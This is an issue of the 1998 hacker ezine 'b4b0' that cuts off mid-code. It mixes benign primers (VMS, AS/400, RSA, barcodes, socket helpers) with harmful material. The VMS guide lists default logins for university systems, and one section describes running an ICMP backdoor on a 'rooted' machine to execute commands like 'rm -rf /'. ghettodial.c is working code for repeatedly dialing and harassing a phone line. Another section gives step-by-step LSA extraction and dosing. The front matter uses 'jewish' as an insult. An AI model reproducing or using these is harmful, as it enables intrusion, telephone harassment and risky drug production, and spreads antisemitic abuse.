VVVVVVVVVVV VVVVVVVVVVV VVVVV[ T34M B4B0 PROUDLY PRESENTS: ]VVVV VVVVVVVVVV VVVVVVVVVV VVVVVVVVVV VVVVVVVVVV . $&y VVVVVVVVVV ,p& y&$ VVVVVVVVVV,a8888a, $$' VVVVVVVVVV,d$$$ $$' VVVVV .s$',8P"' `"Y8, . yxxx.$$.xxxxxxxxxxxx ,d$"`$$.x.$$.xxxxxxxx.,8P.xxxx.s`$$,.xxxg $ P' $$,d$$Yba, ,d$" d $$ $$,d$$Yba, 88 ,$.$$$ $ $ ' $$P' ,`$$a ,d$" ``" $$ , $$$P' ,`Y$a 88 ,s$,$$$ . $ $ $$k g Y$$ $$$$$$$$$$$$$ $$f d d$$ `8b ,$$'d$$' ,d $ bxxx.$$$, '`,d$".xxxxxxxx.$$.x.$$b, ',a$$".x`8ba,,aad$$'.xxxxd. . s$Y"Y$bd$P',yas.VVVV s$$z $Y"Y$$$P"' "Y$$$$(headflux)$ VVVVVVVV VVVVVVVV VVVVVVVV VVVVVVVV vVVVVVVV VVVVVVVV VV[ ISSUE: 5 ]VV VVVVVVVVVVVVVV VVVVVVVVVVVV VVVVVVVVVV VVVVVVVV VVVVVV VVVV VV b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0! THIS ISSUE OF B4B0 BROUGHT TO U BY THE LETTERS: E, L, and by the number 8. b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0! >> b4b0 [V] << ------- -\ table of contentz \- 0x00 - The usual crap / note from editor - Qytpo (and the g4ng) 0x01 - A brief introduction to VMS - gr1p 0x02 - A Demonstration of RSA public key encryption algorithm -ohday 0x03 - Motorola emx2500 switching doqz (see motorola.txt) 0x04 - Bar Coding VS Magnetic Stripe Technology - Qytpo 0x05 - Neat ICMP backdoor - chrak 0x06 - Introduction to AS/400 Computing [Part - 1] - tymat 0x07 - LSA Synthesis - ph1xation (i found it intriguing...) 0x08 - ghettodial.c - Qytpo (tiz humorously stimulating.) 0x09 - High Level UNIX Socket Functions - presonic (see tcpip.tgz) 0x0A - erase.c - chrak (neat.) 0x0B - Commonly Written Network Functions for Linux/Glibc -banana 0x0C - TCP/IP TIC TAC TOE - r4lph (see nttt.c) 0x0D - This issues' Postal Madness (dedicated to our pal JP.) 0x0E - b4b0 headl1nes.. -Qytpo !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !! SPECIAL BONUS WAREZ ISSUE !! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ( see subdirectory appendix/ ) Appendix A: joystick library, itz pretty neat. -ohday Appendix B: shellbin.c (emailed submission from 'cheddar') Appendix C: smoothcolor.c (baldor and giemor - itz rad.) b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0 -\ the people of b4b0 \- position name --------- ---- editor of this issue : Qytpo : editor of last issue : jsbach : grand master whacked : ge0rge : canadian moose hunter : r4lph : admin de b4b0 : tip : offical b4b0 g00k : tymat : pissed-off-and-lovin-it : segv : witty : ohday : gone as far as we know : gr1p : missing in action : lore : pissed off black man : shaki : bovine warrior : the milk : eskimo boy : presoniq : crocidile dundee : duke : can't speak english : flex : -\ fact of the month -\ ----------------------- - there is a city in Mexico, close to the US border called "juarez" -\ url of the month -\ ---------------------- - http://members.xoom.com/yaro/macos/unload.htm (use java capable browzer) -\ most inferior site of the month -\ ------------------------------------- - http://www.antionline.com -\ most elite lib of the decade (*cough*) -\ --------------------------------------------- libclear-1.00.tgz (sunsite.unc.edu/pub/Linux/libs/libclear-1.00.tgz) #include clear(void) { (void)system("clear"); } clear_version(void) { (void)clear(); (void)system("echo Libclear version 1.00 by Michael Freeman\n"); (void)system("echo Press Control-D to continue\n"); (void)system("cat"); (void)clear(); } *** the readme file continues to show this lib's eliteness: LIBCLEAR -- VERSION 1.00 (i will fear 2.00 even more, maybe he will use a path in his system() call.) Ever wanted to be able to clear the screen in a regular unix program without having to call a system("clear"); ? Well now you can! Just link your proggies with this librarie and you can do clear very easily! Imagine just doing clear()... And thats it! Libclear is not freeware however. If you like libclear, you are encouraged to send $5 to me. You can reach my email address at mikef@alexis.prism.net. Any comments about this? Just direct them to me! mikef@alexis.prism.net! Send any bug reports to mikef@alexis.prism.net!!! \=) -Michael Freeman (el8 innovations) *cough* *** and the INSTALL for this is even more funny: Installing this is really EASY!!! Just type mae! :-) (mae? elite.) That will compile libclear and make a test program that uses it! You can run the test program once it's compiled by typing libcleartest!! If you have any questions, please send them to mikef@alexis.prism.net! *caugh caugh* # mae bash: mae: command not found # NOW WHAT THE FUCK DO I DO? bash: NOW: command not found -\ the neat \- -------------- oral sex, shroomz, chopin, hallucinogen, aphex twin, crystal method, lsd, **girls who give head for conf info**, see previous thing, see previous thing, see previous thing, see previous thing, bill clinton, rainbow bright, the smurfs, my size barbie doll (ud be amazed what u can do with thoze things.), nofx, vibrators that plug into a wall outlet, coffee, coffee, and more coffee. -\ the jewish \- ---------------- anyone who does, or knows anyone who gets on any irc network. oh. and the guy who wrote that libclear crap. -------------------------------------------------------------------------- 0x00 - Note from the editor -------------------------------------------------------------------------- Well, on schedule as always, here is issue 5. it iz packed with lots of great reading material, lotz of great educational code, and even an article on how to make your 0wn drugs. IT CANT GET MUCH MORE DIVERSE THAN THAT BABY. As you all know, we have decided to take turns as the editor for this magazine. I have made some changes myself, as I didn't like the first few issues containing *WAY* too *MANY* IRC logs, and *WAY* too *LITTLE* stimulating reading material, I made the difficult *caugh* decision of doing away with them. As for issue 4, well, we decided not to distribute it. It was far too elite for anyone besides JP to handle. We are going to attempt setting a deadline of about 1 issue a month, to meet the demands of our extremely anticipating readers. We now have www.b4b0.org up for your viewing amusement! All the issues are posted on this site, and you can read them while there, or you can download the b4b0.tgz archives. If you read them online, you obviously wont be gifted with the presence of the files included in the full archive. If you have any articles, or mail you wish to send: we always appreciate submissions from people on the internet. a special piq 0n the afr0 to srpato, efpee, gemmi, and any0ne else wh0 chillz with us that i may have missed. WE LOVE U GUYZ. submissions@b4b0.org - article submissions letters@b4b0.org - letters to staff have fun kidz. -Qytpo (optik@inficad.com) -------------------------------------------------------------------------- 0x01 - a brief intro to VMS -------------------------------------------------------------------------- People have been asking quite a few questions about VMS/openVMS recently. They are finding that some machines on University subnets are using OpenVMS and they don't have any experience with this operating system, hopefully this short guide will help a few people along and give them some introductory knowledge of VMS. VMS/OpenVMS is a multi-tasking/processing virtual memory operating system, VMS standing for Virtual Memory System. It is designed to be able to handle memory extensions beyond the capabilities of its processer (VAX - Virtual Address extension). This therefore allows it to run software and programs much larger than its physical memory and processer speed. VMS is also run on the ALPHA platform, which uses Advanced RISC Architecture which provides similar power to a VAX, but the ALPHA allows more flexibility and is slightly more technologically advanced than VAX in the fact that it can support installation of unix based Operating Systems as well as VMS. The Differences between running VMS on a VAX or an ALPHA platform are very small as most programs can just be recompiled and run to suit whichever architecture VMS is running on. The float-type's and Data Alignment technique's on VAX and ALPHA are slightly different, but close enough to coherantly exist without causing any complimation problems in Installation. VMS was first developed in 1976 by DEC (Digital Equipment Corporation) as part of their new 32 bit Virtual memory operating systems project. It has since been supported by many Academic Institutions and large financial companies due to its large power capabilities. It uses a command line scripting language called DCL (Digital Command Language) along with compiler capabilities in other more well-known programming languages such as Pascal, Cobal, Ada, Fortran, C, Basic etc. VMS is a very secure Operating System internally but it does often, by default have some easy to access default logins. (similar to how IRIX often has unpassword lp accounts etc.). Some default logins on VMS include.. guest/guest guest/ operator/operator system/system system/manager system/operator support/support decnet/decnet field/field default/default operations/operations When entering a VMS system will be receive a login prompt/message similar to this.. -=-=- Username: GUEST Password: Welcome to OpenVMS VAX V6.2 Last interactive login on Monday, 14-SEP-1998 20:09 Last non-interactive login on Tuesday, 15-SEP-1998 14:43 There are new messages in folder BLAH. -=-=- You are the presented with a prompt looking this this.. $ .x BASIC VMS COMMANDS x. Below is a list of some basic commands that you will need to know to navigate you way around a VMS system from the command line prompt comfortably.. HELP If in doubt, There is always the help screen. $ help This is large and offers detailed help on MANY commands which are not covered here. LOGOUT Logs the user out of the system. EDIT This brings up the VMS editor (which uses a VT-220 terminal) ACCOUNTING Accounting is the program that keeps logs of the usage users are making from the system. @ This executes a DCL eg. $ @elitedcl.com This is just the same as running a unix style shell script at the command line or even a dos .exe/.com file at dos command line. DEL Deletes a file on the system eg. $ del file.dat RUN This will run an executable file. $ run elite.exe DIR Lists the contents of a directory. There are two widely used options that you should know here. /brief - gives a brief listing of the directory, similar to ls /full - gives a full listing of the directory, similar to ls -al but gives pages on information rather than a little permissions/size chart.. SHOW The show command has quite a few options and can provide a lot of information about the system that you are on. The command must be followed by an option, and some options include.. users - shows all online users at the current time. time - shows the current local time of the system. system - presents you with system information. memory - shows you the memory the machine is using/running. network - displays network information to which the VMS is connected. process - process , similar to unix ps command. devices - list of devices attached to the system. quota - disk quota of current user. TYPE This command will display a file at the terminal, it is the same as the unix cat command. $ type MAIL This will send mail to any machine connected to any shared network or to another local user on the system. SET FILE/PROTECTION This command sets permissions of files, similar to the unix chmod command, however it has different levels of permissions than standard unix permissions. The most common permission for a regular users file is.. $ set file/protection=owner[rwed] leet.dat This sets the permission of leet.dat to read (r), write (w), edit (e), delete (d) permission of the user who owns the file. ie. owner Other possible permissions include.. world - this (in place of owner) would make the file world (rwed?) group - this would give permission to people in the same user group system - this would give permission to all users with system access. eg. $ set file/protection=world[r] leet.dat Would result in leet.dat being world readable. PHONE Phone is a VMS chat program similar to the unix talk program. type $ phone and your prompt will change from a $ to a % at this point type the username of the person you wish to chat with, you can see if they are online via typing 'show users' beforehand. % guest would then start a talk session between yourself and the person logged in as guest. $PASSWORD This would change the password of the user you are logged in as. eg. $ $password fuqy0u Would result in your new password being fuqy0u. CREATE Create is the pascal compiler that is used to compile .pas files. $ create whatever.pas would then result in the production of an executable file from the .pas code. .x FILE EXTENSIONS x. Below is a list of common file extensions in a VMS enviroment, if I missed any common ones out I apoligise.. com - A DCL Batch file. cld - A DCL descriptor file (much like a windoze .dll). dat - A general Data File. exe - An executable file. lis - System Directory listing file. dir - A directory/Subdirectory file tmp - A temporary storage file. txt - A simple text file, also used for outputted mail files. uaf - A user authorisation file. sys - A System Image file. mai - A Mail message file. edt - A command file for the VMS EDT editor. jou - EDT Journal which logs any known problems. ada - Ada source code. bas - Basic Source code. c - C source code. cob - Cobol source code. for - Fortran source code. pas - Pascal code. obj - The compiler creates object code before it links the source [ All examples within this text were demonstrated on an OpenVMS 6.2 system, which is a common VMS system found connected to academic networks today. ] 9x - Spreading H/P in the new millenium. http://www2.dope.org/9x gr1p gr1p@linenoise.org -------------------------------------------------------------------------- 0x02 - RSA Public Key Encryption algorithm demo. -------------------------------------------------------------------------- //demonstration of the rsa public key encryption algorithm #include #include #include #include #include int plaintext[] = { 0x42, 0x34, 0x42, 0x30, 0x20, 0x4c, 0x30, 0x56, 0x45, 0x5a, 0x20, 0x59, 0x30, 0x55, 0x21, 0x00 }; unsigned char primes[] = { 2 , 3 , 5 , 7 , 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199, 211, 223, 227, 229, 233, 239, 241, 251 }; int isprime(short i) /* test any number less than 65536 */ { int j; if (i < 3) return 0; for (j=0 ; j= i) return 1; return 0; } } return 1; } int gcd (int a, int b) { int i; i = a%b; if (i==0) return b; return gcd(b,i); } int modexp(int a, int x, int n) { int r = 1; while (x > 0) { if (x % 2 == 1) r = (r * a) % n; a = (a*a) % n; x /= 2; } return r; } /* calculate e and d */ void calculate (int *ep, int *dp, int t, int p, int q) { int e,d=0; int n; for (e=3 ; e 0x03 - Motorola EMX2500 dox. -------------------------------------------------------------------------- Please see included file, mot.txt.gz -------------------------------------------------------------------------- 0x04 - Advantages and Disadvantages of Magnetic Stripe Tech. -------------------------------------------------------------------------- Bar Coding VS Magnetic-Stripe Technology: While there are many variations on a basic theme, magnetic-stripe recording is not really all that different from printing bar codes. In magnetic materials, there is a two-state choice of polarity, just as there is a two-state choice between either black or white in many printing processes. In fact, with magnetic recording there are "fences" of plus "pickets" strucureded against minus backgrounds (or vice versa), analogous to black bars on white backgrounds. In both circumstances information is delineated by the locations on recording media where there are either plus/minus flux or black/white color changes. Just as with bar codes, information is recovered from magnetic stripes by sweeping read heads across entire coded surfaces and converting positional information into pulse-widthe modulated voltages. As recovered voltages are exactly the same in both circumstances, there is no inherent first read rate or substitution error rate difference betewen the two technologies. Rather, these issues are functions of how well particular vendors design their instruments and what patterns of pickets they elect to use. On the other hand, because magnetic materials are most homogeneous than most printing materials, information can be packed more densely on magnetic stripes than bar codes can be printed on conventional papers. While these higher packing desnsities are advantageous in some circumstances, they require the use of smaller wand tips. Rubbing on abrasive magnetic materials, these smaller wand tips will not last as long as the larger tip jewels used on some bar-code wands. The sensing elements currently found inside magnetic wand tips have been designed around a number of different magnetic phenomena including the Hall Effect, the Magnetostrictive/Piezoelectric Effect, magnetic transistors, and one of the several mangeto-resistances. At the present time, magneto-resistors appear to be simpler and less expensive than the alternatives and are most commonly used. In this application, magneto-resistors have a depth of field of about 0.007 inch. This means, that for all practical purposes, wand tips must be held in contact with magnetic stripes during read traverses. Or at best, the magnetic stripes can be covered only with a very thin film of non-magnetic material. As the coding density potential for magnetic stripes is superior to that of bar codes, magnetic stripes may well have an advantage in those applications where a great deal of information must be machine-read from data cards. Then too, where information stored on a card is subject to change (to updating), the magnetic stripe technique may well be the only practical answer. But these attributes have limited application to general manufacturing problems, and other traits inherent to magnetic recording are lmited. For instance, it is difficult to print magnetic stripe labels. Certainly the use of adhesive magnetic-stripe labels manually attached to multiple copies of documents is not a pragmatic solution to document identification systems. Further, magnetic stripes cannot be read from a distance, data destruction of magnetically encoded messages is not visible if it occurs, and magnetic stripes can easily be erased by an imposed magnetic field of very few gauss. ----------------------- Magnetic Stripe Reading ----------------------- Disadvantages: - expensive media - not human readable - modifiable - word processing incompatbile - difficult to copy - restricted format - low print rate - cannot be read through plastic cover - not beam scannable Advantages: - read-write capability - low error rate - non-critical wanding - full character set ---------------- Bar Code Reading ---------------- Advantages: - easy to print - easy to copy - word processing compatible - low error rate - non-critical wanding - full character set - inexpensive media - non-restricted format - inexpensive to read - high speed printable - material imprintable - beam scannable Disadvantages: - low information density - - - - - - - - - - - - - - - - - - - - - Most information for this article - - came directly from "The Handbook of - - Bar Coding Systems" - Hary E. - - Burke, under the aegis of the Data - - Pathing Systems Divison/NCR - - Corporation. If you are interested - - in this subject, i suggest this - - as reading material. - - - - - - - - - - - - - - - - - - - - - -Qytpo -------------------------------------------------------------------------- 0x05 - Neat ICMP backdoor -------------------------------------------------------------------------- Please see included file, icmpbd-linux.tgz the client attaches a string to the end of the icmp header, sets the ip src addr to 6.6.6.6 and icmp type to 8. the server which should be running on a linux system when it receives the icmp packet it will exec the string that was attached by the client. Just ./server on the rooted system. and to exec commands on it completely anonymously you can: ./client rm -rf / or anything else. This is only one way though and you can not see the executed programs output. -SHAKI/chrak -------------------------------------------------------------------------- 0x06 - AS/400 Information -------------------------------------------------------------------------- Introduction to AS/400 Computing Part 1 - Very Basic Concepts tymat@b4b0.org I. Key Features of the AS/400 AS/400 is a computer platform made by IBM that runs the OS/400 Operating System. The three key features of the AS/400 are: 1) Integrated Applications - software components such as relational database programs, security software, internet applications, and programming environment are part of the Operating System. 2) High Availability - like most IBM computing systems (like AIX) the AS/400 is considered as a high availability system by which most major changes to the system do not require an IPL (Initial Program Load or a reboot). 3) Multiprocessor - an AS/400 machine can have many different processors separate from the system processor which is responsible for a particular I/O device. Figure 1.1 shows a typical AS/400 configuration. Figure 1.1 ____________________ | System Processor | // New models of the AS/400 can have |__________________| // up to 12 64bit processors | | ____________|_____________ | System Main Bus | |________________________| / \ / \ _____|___________ ________|________ | I/O Interface | | I/O Interface | |_______________| |_______________| | | ______|________ ________|______ | SPD I/O Bus | | PCI I/O Bus | |_____________| |_____________| / \ Devices...... Integrated PC Server - Novell - Lotus Domino - Windows NT - PC TCP/IP Stack // This is independent of - TCP/IP Firewall // OS/400s own TCP/IP stack - Proxy Server // and vice-versa. - Lotus Domino SMTP Mail Other key features that make the AS/400 an attractive platform to many business are: 4) Single Level Storage Technology - Programs work with objects and object names so hardware is always accessed by name and not by its address. 5) Large Address Size - With a 64bit addressing space, the AS/400 can address up to 18.4 quintillion bytes. 6) Fully Object Oriented - All system resources, such as data structures, are packaged within an object. This means that AS/400 instructions can only work on what they are supposed to work on so data will never be treated as executable code. 7) Internet Ready - New AS/400 systems have full internet capabilities which allows AS/400 machines to act as web servers (with full SSL capabilities). 8) Robust Programming Environment - OS/400 comes with several different programming environments such as CL (Control Language), ILE, COBOL, RPG III & IV, and Java II. TCP/IP Connectivity The AS/400 supports many different TCP/IP application protocols such as FTP, SMTP, Telnet, and network printing. The AS/400 has a complete implementation of the sockets API which are all integrated into OS/400. The AS/400 supports many different network interfaces ranging from token ring, ethernet, x.25, frame relay, fiber distributed digital interface, and serial. III. File Structures There are 10 different file structures which are divided into 5 main categories. Each file structure has a corresponding CRTxxxF command which is used to create these files. Figure 3.1 is a chart which summarizes these file types. Figure 3.1 File Type Subtype File Description Create Command Database File PF Physical File CRTPF LF Logical File CRTLF Source File PF Physical Source File CRTSRCPF Device File DSPF Workstation Display File CRTDSPF PRTF Printer File CRTPRTF TAPF Tape File CRTTAPF DKTF Diskette File CRTDKTF ICFF Intersystem Communications CRTICFF Function File DDM File DDMF Distributed Data Management CRTDDMF File Save File SAVF Save File CRTSAVF Ok, that's it for this issue. From now on there will be an AS/400 related article in every issue of B4B0 and each will depend on previous AS/400 articles released in this zine. The purpose of these beginner-level articles is to get the reader up to speed on AS/400 basics so in the near future I will be able to discuss an overview of AS/400 security and probably base these articles for more in-depth lectures on AS/400 security and programming in the future. It is quite sad but 99% of B4B0 readers have no clue about AS/400 and if I started discussing advanced AS/400 topics it would only go to waste. Next issue we will tackle more about file structures and then I will start discussing more user-level related tasks such as maneuvering the OS/400 menu system and customizing commands. -------------------------------------------------------------------------- 0x07 - LSA Synthesis. -------------------------------------------------------------------------- Phixation's guide to synthesizing Lysergic Acid Amide from MG seed'z Introduction: This article I have written is a run through on the cleanest most effective way in synthesizing LSA from Morning Glory Seeds. I suggest all Acid Heads read furthur, that is if you havent fried your brain to the core yet like some of us. Believe me, having a fully functional brain could make such an insurmountable difference. Keep in mind we are going to be working woth Petroleum Ether (Naptha). In some cases it could be EXTREMELY deadly. 1. Equipment 2. Ingredients 3. Um.. freeze. kr0nfieldz (Note. You may want to go to the bottom detailed explanation on how the s eed/ethanol ratio goes so you know how much of what to add.) ------------------------------------------------------------------------------ Section 1. Before you pickup any of the chemicals/ingredients you need for this extraction it is a neccessity that you atleast have the following equipment, or something that is an equal substitute for any of the following that is required. 2 Jars with lids on them. (One for the pet ether, the other for the MG/Ethanol) 1 coffee filter or funnel (To filter the ether from the MG seeds) Coffee filters or filter paper (For use with funnel) coffee grinder (To grind the MG seeds) ------------------------------------------------------------------------------ Section 2. Most of the following is required, the other shit is dumped on your own personal preference. (Uhm.. freeze. Ingredients) Morning Glory Seeds, (1 seed = 1 microgram..) Petroleum Ether (In hardware stores you can find it as "Naptha") Any type of Ethanol liquid that will work for human ingestion. Any of the following will work: Bracardi 151, Segrums 7 50%, Vodka, Everclear, Basically just any beverage of 80 proof or better. ------------------------------------------------------------------------------ Section 3. (Uhm.. freeze! Cornfields in one hour! Be there or be square =) Try to take good precaution while doing this, although it is fairly safe. I could see some people gettting just a little bit carried away with the Pet Ether. Im sure inhaling it makes you feel splended.. at first, but as I said before! Its fatal! (*note* This document is assuming your using 500mg seeds.) 1. Wash MG seeds good in detergent and cold water... 2. Grind the MG seeds in the Coffee Grinder to the finest the powder will get. 3. Put the grinded seeds into one of your jars, and then add enough Pet ether (Naptha) to where the grinded seeds are just barely submerged beneath the Pet ether. 4. Put the lid tightly on the jar and shake rapidly for 20 minutes on and off. 5. Now remove the lid and pour the shit into the filter with the filter paper in place. (Note. If you want to be safe, do this outside. Otherwise the Naptha could dispute a rather hostile gas.) 6. You should now have the Pet ether in one of your jars, and the grinded seeds should be on the filter. 7. Let the seed powder dry out on a paper plate for a good 2/3 hours. 8. After the powder is dry, place it in the other jar. (This part could be quite crucial if not performed with the preffered ratio.) 9. Now add the desired amount of alchohol depending on the intensity you want to experience in your trippy journey. (Read below for details.) ------------------------------------------------------------------------------ (Uhm.. Freeze! Bucktooth.) If you are new to tripping, or are just scared of intense trips, I suggest using about 30-50 seeds every 1`oz of ethanol(alchohol). Per`se you wanted to make a 500 seed batch, then you would poor about 10oz of ethanol into the jar with the powdered MG seeds. If you are cool with your average intense trip with some neat hallucinations, but mild to an extent, use 1`oz per every 250 seeds. Which in this case you probably used 500 seeds, so put 2oz of alchohol in the jar with the powdered mg seeds. (If you want stronger, figure it out. Im sure you understand how the delution ration works) ------------------------------------------------------------------------------ 10. After you have mixed your desired amount of alchohol with the seed powder, shake the jar quite frequently on and off for about 3 days. 11. All of the LSA should be deluted in with the ethanol by now. Use your filter one more time, and filter the ethanol from the seeds. 12. Throw the seeds away and preciously glance at your cup of acid. 13. If you made it using 500 seeds, and 2oz of ethanol, drink half of it. 15 seconds later you should feel quite odd. The response this type of acid is almost instantanious due to the fact that the LSA is deluted with ethanol, and ethanol hits your mucus membraine and goes strait to your brain. If you used 10oz of ethanol then there should be about 50 micrograms per ounce. Split your cup of the liquid into 1/10 and take a 1/10. If you want stronger affects take a bit more. Conclusion: Hrm.. well thats about it. Just hoped you payed attention to my little tips that I put in here and there. And uhm.. w0rd to all yew buckt00th raz0rcats..yew f00lz are da fuqin sickmade. Um.. ph33r da bucktooth. Phixation.. -------------------------------------------------------------------------- 0x08 - GhettoDial.c - Qytpo -------------------------------------------------------------------------- /* Qytpo - 1998 */ /* */ /* merely for your amusement. nothing special, or technically superior */ /* use it to get out of exams. ANI your favorite classroom line. */ /* etc etc. */ #include #include #include #include #include #include #include #include #include #define MODEM "/dev/cua1" /* yer modem port.. of course */ /* /dev/modem if yer not sure.. */ #define DIALSTRING "ATDT5551212\r" /* number to dial..put *62 in */ /* front if you want to call */ /* anonymously, depending on your */ /* phone company. */ #define INTERVAL 10 /* the time between calls */ int main(int argc, char *argv[]) { int fd; int ret; printf("\n%s - Qytpo\n", argv[0]); printf("\nEach [.] represents a call.\n"); printf("\nNumber to dial: %s", DIALSTRING); printf("\n\nDialing: "); fflush(stdout); while(1) { fd = open(MODEM, O_RDWR | O_NOCTTY | O_NDELAY); if(fd == -1) { perror("open();\n"); printf("Unable to open comport: %s\n", MODEM); exit(-1); } ret = write(fd, "ATZ\r", 4); if(ret == -1) { perror("write();\n"); printf("Unable to initialize modem\n"); exit(-1); } sleep(2); ret = write(fd, DIALSTRING, strlen(DIALSTRING)); if(ret == -1) { perror("write();\n"); printf("Unable to dial number\n"); exit(-1); } sleep(INTERVAL); ret = write(fd, "ATH\r", 4); if(ret == -1) { perror("write();"); printf("Unable to hang up modem.\n"); exit(-1); } close(fd); fprintf(stdout, "."); fflush(stdout); } close(fd); exit(0); } -------------------------------------------------------------------------- 0x09 - High Level UNIX Socket Functions - presonic -------------------------------------------------------------------------- High Level Unix Socket Functions (v0.2) jjohnson@eagle.ptialaska.net | presonic@irc (See tcpip.tgz) This is the second release. Changes include readline() and some new features in i_nslookup. This version also includes the http_ver.c example, and subscan has been updated. God knows why I made two different versions of subscan. I couldn't decide which one was better, so I included them both. I plan to actually start working on this as one of my main projects, so lots of shit should be implimented in the next release. Thanks to seyon for lending me his fbsd box. Tested on: * linux 2.0.* (slackware/redhat) * freebsd 2.2.7 (please note that the subscan examples will not work properly in any bsd variant due to its design. http_ver, however, works great.) Shit planned for future releases: * high level icmp sending/receiving * high level udp sending/receiving * high level raw icmp/udp/tcp * high level tcp server/daemon functions * multi-platform abilities These functions can be used to learn how to use socket functions, or to avoid learning them. That part, has been left to you. Both subscan and http_ver are examples on how to use the socket functions. subscan uses advanced non blocking i/o and select() stuff, so it may be hard to follow for neophytes. You may use these in your program however you please. All I ask is that you drop me an e-mail to tell me what you're using it for. See tcpip.c for more details. Files: README you're fat. Makefile type 'make' and see. tcpip.c *the* socket functions. subscan.log.c a scanner that sweeps a subnet for a given port. (appends the scan to a log file, stdout is closed) subscan.stdout.c a scanner that sweeps a subnet for a given port. (sprays output to stdout) http_ver.c this query's a web server and try's to find the server version. -------------------------------------------------------------------------- 0x0A - erase.c - chrak -------------------------------------------------------------------------- #include #include #include #include #include off_t getflen(int); void pexit(char *); void main(int argc, char *argv[]) { unsigned char *buf; FILE *f, *r; int i1; off_t i, len; if (argc == 1) { printf("usage: %s file\ndestroys file -chrak\n", argv[0]); exit(-1); } if ((f = fopen(argv[1], "r+")) == NULL) pexit("fopen"); if ((r = fopen("/dev/urandom", "r")) == NULL) pexit("fopen"); len = getflen(fileno(f)); if ((buf = mmap(0, len, PROT_WRITE, MAP_SHARED, fileno(f), 0)) == (void *) -1) pexit("mmap"); for (i1 = 0; i1 < 3; i1++) { for (i = 0; i < len; i++) buf[i] = fgetc(r); /* do error checking later */ sync(); printf("Finnished pass %d\n", i1); } if (remove(argv[1]) == -1) pexit("remove"); } off_t getflen(int fd) { struct stat str_stat; if (fstat(fd, &str_stat)) { perror("fstat"); return -1; } return str_stat.st_size; } void pexit(char *s) { perror(s); exit(-1); } -------------------------------------------------------------------------- 0x0B - Commonly Written Network Functions for Linux/glibc -------------------------------------------------------------------------- /* this is for glibc */ /* network functions v.01 by banana */ /* feel free to rip these and not give me credit.. the idea here is that you wont have to reinvent the wheel in your c0de or whatever.. */ #include #include #include #include #include #include #include #include #include #include #include #include #include #define DEBUG 0 /* unsigned long int blah = lookup("www.microsoft.com"); would put microsofts ip in blah ( net byte order ) */ unsigned long int lookup(char *hostname) { struct hostent *name; unsigned long int address; if((address = inet_addr(hostname)) != -1) return address; if( (name = gethostbyname(hostname)) == NULL) return -1; memcpy(&address, name->h_addr, name->h_length); return address; } char *rlookup(u_long ip) { static char hostname[256]; struct hostent *host; struct sockaddr_in addr; addr.sin_addr.s_addr = ip; if((host=gethostbyaddr((char *)&addr.sin_addr, sizeof(addr.sin_addr),AF_INET)) == NULL) sprintf(hostname, "%s", inet_ntoa(ip)); strncpy(hostname, host->h_name, sizeof(hostname)); return hostname; } /* connect to a host, return a socket descriptor. */ int connect_to_host(unsigned long int ip, int port) { struct sockaddr_in sheep; int sockfd, spare; if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) return -1; sheep.sin_port = htons(port); sheep.sin_family = AF_INET; sheep.sin_addr.s_addr = ip; if( (spare = connect(sockfd, (struct sockaddr *)&sheep, sizeof(sheep)) ) == -1) return -1; return sockfd; } /* simple little finger client. .. printf(finger(lookup("www.microsoft.com"), "jsbach")); */ char *finger(unsigned long int ip, char *user) { int fd, spare; static char buf[512]; char send[512]; strncpy(send, user, 512); bzero(buf, 512); if( (fd = connect_to_host(ip, 79)) == -1) return NULL; write(fd,send,strlen(send)); if(read(fd, buf, 512) <= 0) { printf("unsuccessful read.\n"); return NULL; } return buf; } /* this function is used to check if a host is up * (duh) pass it the network byte ordered ip address to check. */ int ping(unsigned long int ip) { void ret(int signo) { return; } struct iphdr echo; struct in_addr this_is_bs; /* predone icmphdr assembly ripped from nmap by fyodor */ unsigned char ping[64] = { 0x8, 0x0, 0x8e, 0x85, 0x69, 0x7A }; int sockfd, sniff_fd; time_t temp, temp1; struct sockaddr_in sheep; bzero(&echo, sizeof(echo)); sysv_signal(SIGALRM, ret); memset(&sheep, 0, sizeof(sheep)); sheep.sin_family = AF_INET; sheep.sin_addr.s_addr = ip; /* (there are no ports in icmp!) */ sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP); temp1 = sendto(sockfd, (char *)ping, sizeof(ping), 0, (struct sockaddr *)&sheep, sizeof(sheep)); if (DEBUG == 1) printf("sendto ret in ping is %d!\n", temp1); alarm(4); time(&temp); temp1 = temp + 5; while(temp < temp1) { bzero(&echo, sizeof(echo)); read(sockfd,(struct packet *)&echo, sizeof(echo)); alarm(0); this_is_bs.s_addr = echo.saddr; if(DEBUG == 1) printf("Packet read. with src address %s.\n",inet_ntoa(this_is_bs)); if(echo.saddr == ip) { return 1; } time(&temp); /* if we received a icmp echo packet from the host that * wasn't a response to our packet, it still means the host * is up ;) */ return 0; } } /* get our own local ip address by pinging another host and looking at the dest addr on the ICMP echo reply. */ unsigned long int getlocaladdr(unsigned long int ip) { void ret(int signo) { return; } struct iphdr echo; struct in_addr this_is_bs; /* predone icmphdr assembly ripped from nmap by fyodor */ unsigned char ping[64] = { 0x8, 0x0, 0x8e, 0x85, 0x69, 0x7A }; int sockfd, sniff_fd; time_t temp, temp1; struct sockaddr_in sheep; bzero(&echo, sizeof(echo)); signal(SIGALRM, ret); memset(&sheep, 0, sizeof(sheep)); sheep.sin_family = AF_INET; sheep.sin_addr.s_addr = ip; /* (there are no ports in icmp!) */ sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP); temp1 = sendto(sockfd, (char *)ping, sizeof(ping), 0, (struct sockaddr *)&sheep, sizeof(sheep)); if (DEBUG == 1) printf("sendto ret in ping is %d!\n", temp1); alarm(4); time(&temp); temp1 = temp + 5; while(temp < temp1) { bzero(&echo, sizeof(echo)); read(sockfd,(struct packet *)&echo, sizeof(echo)); alarm(0); this_is_bs.s_addr = 